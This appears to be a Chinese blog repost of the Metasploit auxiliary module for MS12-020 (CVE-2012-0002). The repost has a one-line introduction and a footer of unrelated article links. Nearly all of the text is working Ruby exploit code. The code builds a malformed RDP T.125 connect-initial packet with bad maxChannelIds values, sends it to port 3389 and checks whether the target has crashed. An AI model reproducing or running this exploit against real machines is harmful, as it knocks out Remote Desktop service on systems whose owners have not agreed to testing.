MS12-020 RDP DoS From Metasploit-白红宇

MS12-020 RDP DoS From Metasploit

阅读量：5213 次

发布时间：2019-06-14

本文共 5184 字，大约阅读时间需要 17 分钟。

MS12-020 Exp，由意大利的小伙报告给了Microsoft，于是乎...

http://aluigi.org/adv/termdd_1-adv.txt

### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.#   http://metasploit.com/framework/##require 'msf/core'class Metasploit3 < Msf::Auxiliary	include Msf::Auxiliary::Report	include Msf::Exploit::Remote::Tcp	include Msf::Auxiliary::Dos	def initialize(info = {})		super(update_info(info,			'Name'           => 'MS12-020 Microsoft Remote Desktop Use-After-Free DoS',			'Description'    => %q{				This module exploits the MS12-020 RDP vulnerability originally discovered and				reported by Luigi Auriemma.  The flaw can be found in the way the T.125				ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result				an invalid pointer being used, therefore causing a denial-of-service condition.			},			'References'     =>				[					[ 'CVE', '2012-0002' ],					[ 'MSB', 'MS12-020' ],					[ 'URL', 'http://www.privatepaste.com/ffe875e04a' ],					[ 'URL', 'http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],					[ 'URL', 'http://pastie.org/private/feg8du0e9kfagng4rrg' ],					[ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],					[ 'URL', 'http://www.exploit-db.com/exploits/18606/' ]				],			'Author'         =>				[					'Luigi Auriemma',					'Daniel Godas-Lopez',  # Entirely based on Daniel's pastie					'Alex Ionescu',					'jduck',					'#ms12-020' # Freenode IRC				],			'License'        => MSF_LICENSE,			'DisclosureDate' => "Mar 16 2012"		))		register_options(			[				Opt::RPORT(3389)			], self.class)	end	def is_rdp_up		begin			connect			return true		rescue Rex::ConnectionRefused			return false		rescue Rex::ConnectionTimeout			return false		end	end	def run		max_channel_ids = "\x02\x01\xff"		pkt = ''+			"\x03\x00\x00\x13" +  # TPKT: version + length			"\x0E\xE0\x00\x00" +  # X.224 (connection request)			"\x00\x00\x00\x01" +			"\x00\x08\x00\x00" +			"\x00\x00\x00"     +			"\x03\x00\x00\x6A" +  # TPKT: version + length			"\x02\xF0\x80"     +  # X.224 (connect-initial)			"\x7F\x65\x82\x00" +  # T.125			"\x5E"             +			"\x04\x01\x01"     +  # callingDomainSelector			"\x04\x01\x01"     +  # calledDomainSelector			"\x01\x01\xFF"     +  # upwardFlag			"\x30\x19"         +  # targetParameters			max_channel_ids    +  # maxChannelIds			"\x02\x01\xFF"     +  # maxUserIds			"\x02\x01\x00"     +  # maxTokenIds			"\x02\x01\x01"     +  # numPriorities			"\x02\x01\x00"     +  # minThroughput			"\x02\x01\x01"     +  # maxHeight			"\x02\x02\x00\x7C" +  # maxMCSPDUsize			"\x02\x01\x02"     +  # protocolVersion			"\x30\x19"         +  # minimumParameters			max_channel_ids    +  # maxChannelIds			"\x02\x01\xFF"     +  # maxUserIds			"\x02\x01\x00"     +  # maxTokenIds			"\x02\x01\x01"     +  # numPriorities			"\x02\x01\x00"     +  # minThroughput			"\x02\x01\x01"     +  # maxHeight			"\x02\x02\x00\x7C" +  # maxMCSPDUsize			"\x02\x01\x02"     +  # protocolVersion			"\x30\x19"         +  # maximumParameters			max_channel_ids    +  # maxChannelIds			"\x02\x01\xFF"     +  # maxUserIds			"\x02\x01\x00"     +  # maxTokenIds			"\x02\x01\x01"     +  # numPriorities			"\x02\x01\x00"     +  # minThroughput			"\x02\x01\x01"     +  # maxHeight			"\x02\x02\x00\x7C" +  # maxMCSPDUsize			"\x02\x01\x02"     +  # protocolVersion			"\x04\x82\x00\x00" +  # userData			"\x03\x00\x00\x08" +  # TPKT: version + length			"\x02\xF0\x80"     +  # X.224			"\x28"             +  # T.125			"\x03\x00\x00\x08" +  # TPKT: version + length			"\x02\xF0\x80"     +  # X.224			"\x28"             +  # T.125			"\x03\x00\x00\x08" +  # TPKT: version + length			"\x02\xF0\x80"     +  # X.224			"\x28"             +  # T.125			"\x03\x00\x00\x08" +  # TPKT: version + length			"\x02\xF0\x80"     +  # X.224			"\x28"             +  # T.125			"\x03\x00\x00\x08" +  # TPKT: version + length			"\x02\xF0\x80"     +  # X.224			"\x28"             +  # T.125			"\x03\x00\x00\x08" +  # TPKT: version + length			"\x02\xF0\x80"     +  # X.224			"\x28"             +  # T.125			"\x03\x00\x00\x08" +  # TPKT: version + length			"\x02\xF0\x80"     +  # X.224			"\x28"             +  # T.125			"\x03\x00\x00\x08" +  # TPKT: version + length			"\x02\xF0\x80"     +  # X.224			"\x28"             +  # T.125			"\x03\x00\x00\x0C" +  # TPKT: version + length			"\x02\xF0\x80"     +  # X.224			"\x38\x00\x06\x03" +  # T.125			"\xF0"             +			"\x03\x00\x00\x09" +  # TPKT: version + length			"\x02\xF0\x80"     +  # X.224			"\x21\x80"            # T.125		connect		print_status("#{rhost}:#{rport} - Sending #{self.name}")		sock.put(pkt)		select(nil, nil, nil, 3)		disconnect		print_status("#{rhost}:#{rport} - #{pkt.length.to_s} bytes sent")		print_status("#{rhost}:#{rport} - Checking RDP status...")		if not is_rdp_up			print_good("#{rhost}:#{rport} seems down")			report_vuln({				:host => rhost,				:port => rport,				:name => self.fullname,				:refs => self.references			})		else			print_status("#{rhost}:#{rport} is still up")		end	endend

转载于:https://www.cnblogs.com/sp1d3r/archive/2012/03/23/2413707.html

你可能感兴趣的文章

2007-11-9前琐碎事情

查看>>

Java向PostgreSQL发送prepared statement 与 libpq 向PostgreSQL发送prepared statement之比较：...

查看>>

GNU make manual 翻译( 九十七)

查看>>

TortoiseSVN的bin目录中没有svn.exe

查看>>

iOS开发运行报错、常见问题

查看>>